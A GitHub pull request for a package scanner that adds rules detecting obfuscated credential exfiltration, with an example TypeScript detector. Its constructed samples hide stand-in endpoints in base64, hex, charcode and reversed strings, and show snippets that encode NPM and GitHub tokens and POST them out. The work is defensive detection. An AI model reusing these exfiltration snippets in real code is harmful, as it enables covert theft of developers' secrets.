
feat(scanner): detect obfuscated credential exfiltration#74

Open
cybercraftsolutionsllc wants to merge 1 commit into counterspec:main from cybercraftsolutionsllc:codex/obfuscated-credential-exfiltration

Conversation

@cybercraftsolutionsllc

Summary

Adds scanner patterns for obfuscated credential exfiltration in npm/PyPI-style package code.

Detection Rules

  • EXFIL_BASE64_URL: detects http:// and https:// exfiltration endpoints hidden with base64 via atob() or Buffer.from(..., "base64").
  • EXFIL_HEX_URL: detects http:// and https:// endpoints hidden as hex strings via JavaScript and Python decoding helpers.
  • EXFIL_CHARCODE_URL: detects endpoints assembled from JavaScript String.fromCharCode(...) or Python chr(...) chains.
  • EXFIL_REVERSED_URL: detects reversed http(s) endpoint literals decoded through split().reverse().join().
  • EXFIL_OBFUSCATED_ENV_SEND: detects token/secret environment variable access combined with encoding or obfuscation near outbound sinks like fetch, axios, request, requests.post, urllib3, http(s).request, or sendBeacon.

Tests

Added scanner/src/obfuscated-exfiltration.test.ts with ten cases covering:

  • base64 encoded HTTPS URL
  • base64 encoded HTTP URL
  • JavaScript hex encoded HTTPS URL
  • Python hex encoded HTTPS URL
  • JavaScript charcode URL construction
  • Python chr() URL construction
  • reversed HTTPS URL construction
  • encoded npm token exfiltration
  • encoded GitHub token exfiltration
  • benign base64 image data/public config negative case

Validation

cd scanner
npm test

Result: 10 tests passing.

Additional false-positive sanity check:

node --input-type=module -e "<scan scanner/node_modules for new EXFIL_* rule IDs>"

Result: scanned 3,371 dependency JavaScript files with 0 findings from the new rule IDs.

Closes #1.
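The five rules listed in the description above, demonstrated as an added example that is not the counterspec scanner's code: a decoder-aware TypeScript detector that unwraps each encoding (base64, hex, charcode chains, reversed literals), looks for an http(s) endpoint in the decoded text rather than in the source text, and correlates a secret-looking environment read with an encoding step and an outbound sink within a few lines. The rule IDs are taken from the PR description; every regex, the five-line correlation window, the helper names and the sample snippets are assumptions constructed for this example.

```typescript
// Added example, not the counterspec scanner's code: a decoder-aware detector
// for the obfuscation patterns named in the PR. Rule IDs reuse the PR's names;
// every regex, the 5-line window and the sample inputs are assumptions.
import { Buffer } from "node:buffer";

export interface Finding { ruleId: string; line: number; evidence: string }

const URL_RE = /https?:\/\/[^\s"'`<>]+/i;

// One regex per encoding, each anchored on the decoding helper that unwraps it.
const BASE64_RE = /(?:atob|Buffer\.from|b64decode)\(\s*["'`]([A-Za-z0-9+/=]{12,})["'`]\s*(?:\)|,\s*["'`]base64["'`])/g;
const HEX_RE = /(?:Buffer\.from\(\s*["'`]([0-9a-fA-F]{16,})["'`]\s*,\s*["'`]hex["'`]|bytes\.fromhex\(\s*["'`]([0-9a-fA-F]{16,})["'`])/g;
const CHARCODE_RE = /String\.fromCharCode\(\s*((?:\d+\s*,\s*)+\d+)\s*\)/g;
const CHR_CHAIN_RE = /((?:chr\(\s*\d+\s*\)\s*\+\s*){7,}chr\(\s*\d+\s*\))/g;
const REVERSED_RE = /["'`]([^"'`]{10,})["'`]\s*\.split\(\s*(?:""|'')\s*\)\s*\.reverse\(\s*\)\s*\.join\(\s*(?:""|'')\s*\)/g;

// EXFIL_OBFUSCATED_ENV_SEND: secret-looking env read + encoding step + outbound
// sink, all within WINDOW lines of the env read (assumed heuristic).
const ENV_SECRET_RE = /(?:process\.env(?:\.|\[["'])|os\.environ(?:\.get\(|\[)["']?)([A-Z0-9_]*(?:TOKEN|SECRET|KEY|PASSWORD)[A-Z0-9_]*)/;
const ENCODE_RE = /(?:\bbtoa\(|\bb64encode\(|\.toString\(\s*["'`](?:base64|hex)["'`]\s*\)|\.hex\(\))/;
const SINK_RE = /\b(?:fetch|axios(?:\.\w+)?|request|requests\.post|urllib3(?:\.\w+)*|https?\.request|sendBeacon)\s*\(/;
const WINDOW = 5;

function allMatches(re: RegExp, s: string): RegExpExecArray[] {
  const out: RegExpExecArray[] = [];
  re.lastIndex = 0; // the rule regexes are shared /g constants
  let m: RegExpExecArray | null;
  while ((m = re.exec(s)) !== null) out.push(m);
  return out;
}

// Decode every obfuscated literal on a line; the caller decides whether it is a URL.
function decodeCandidates(line: string): Array<{ ruleId: string; text: string }> {
  const out: Array<{ ruleId: string; text: string }> = [];
  for (const m of allMatches(BASE64_RE, line))
    out.push({ ruleId: "EXFIL_BASE64_URL", text: Buffer.from(m[1], "base64").toString("utf8") });
  for (const m of allMatches(HEX_RE, line))
    out.push({ ruleId: "EXFIL_HEX_URL", text: Buffer.from(m[1] || m[2], "hex").toString("utf8") });
  for (const m of allMatches(CHARCODE_RE, line))
    out.push({ ruleId: "EXFIL_CHARCODE_URL", text: String.fromCharCode(...m[1].split(",").map(Number)) });
  for (const m of allMatches(CHR_CHAIN_RE, line))
    out.push({ ruleId: "EXFIL_CHARCODE_URL", text: String.fromCharCode(...allMatches(/chr\(\s*(\d+)\s*\)/g, m[1]).map((c) => Number(c[1]))) });
  for (const m of allMatches(REVERSED_RE, line))
    out.push({ ruleId: "EXFIL_REVERSED_URL", text: m[1].split("").reverse().join("") });
  return out;
}

export function scanSource(source: string): Finding[] {
  const lines = source.split(/\r?\n/);
  const findings: Finding[] = [];
  lines.forEach((line, i) => {
    for (const c of decodeCandidates(line)) {
      const url = URL_RE.exec(c.text); // match on the decoded text, not the source
      if (url) findings.push({ ruleId: c.ruleId, line: i + 1, evidence: url[0] });
    }
    const env = ENV_SECRET_RE.exec(line);
    if (env) {
      const nearby = lines.slice(Math.max(0, i - WINDOW), i + WINDOW + 1).join("\n");
      if (ENCODE_RE.test(nearby) && SINK_RE.test(nearby))
        findings.push({ ruleId: "EXFIL_OBFUSCATED_ENV_SEND", line: i + 1, evidence: env[1] });
    }
  });
  return findings;
}

// Constructed samples (not real packages). Literals decode to example.* hosts.
export const MALICIOUS_JS = [
  'const u = atob("aHR0cHM6Ly9jb2xsZWN0LmV4YW1wbGUvdXA=");',
  'const h = Buffer.from("687474703a2f2f6576696c2e6578616d706c652f78", "hex").toString();',
  'const c = String.fromCharCode(104,116,116,112,115,58,47,47,120,46,101,120,97,109,112,108,101);',
  'const r = "pu/elpmaxe.tcelloc//:sptth".split("").reverse().join("");',
  'const t = process.env.NPM_TOKEN;',
  'const body = Buffer.from(t).toString("base64");',
  'fetch(u, { method: "POST", body });',
].join("\n");
export const MALICIOUS_PY = [
  'import os, base64, requests',
  'endpoint = bytes.fromhex("687474703a2f2f6576696c2e6578616d706c652f78").decode()',
  'alt = chr(104)+chr(116)+chr(116)+chr(112)+chr(115)+chr(58)+chr(47)+chr(47)+chr(120)+chr(46)+chr(101)+chr(120)+chr(97)+chr(109)+chr(112)+chr(108)+chr(101)',
  'tok = os.environ.get("GITHUB_TOKEN")',
  'requests.post(endpoint, data=base64.b64encode(tok.encode()))',
].join("\n");
// Negative case: base64 image data, base64 JSON config, env read with no send.
export const BENIGN_JS = [
  'const png = Buffer.from("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==", "base64");',
  'const cfg = JSON.parse(atob("eyJ0aGVtZSI6ImRhcmsiLCJsYW5nIjoiZW4ifQ=="));',
  'const apiKeyLabel = process.env.API_KEY_LABEL;',
  'console.log(png.length, cfg, apiKeyLabel);',
].join("\n");

console.log(scanSource(MALICIOUS_JS), scanSource(MALICIOUS_PY), scanSource(BENIGN_JS));
```

The point of decoding before matching is that a reversed or charcode-built endpoint never appears as `http` anywhere in the source text, so a literal URL regex cannot see it; the negative sample shows why the decoded text, not the presence of `atob()` or `Buffer.from()`, has to be the trigger, since base64 image data and base64 config are routine in benign packages. The env rule is a proximity heuristic: a token read in one module and sent from another, or an encoding step more than `WINDOW` lines away, will be missed, which is the usual trade-off against flagging every `process.env` read.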

@vercel

vercel Bot commented May 14, 2026

@patchledgerops-agent is attempting to deploy a commit to the Rapi's projects Team on Vercel.

A member of the Team first needs to authorize it.



Development

Successfully merging this pull request may close these issues.

Detect obfuscated credential exfiltration patterns

2 participants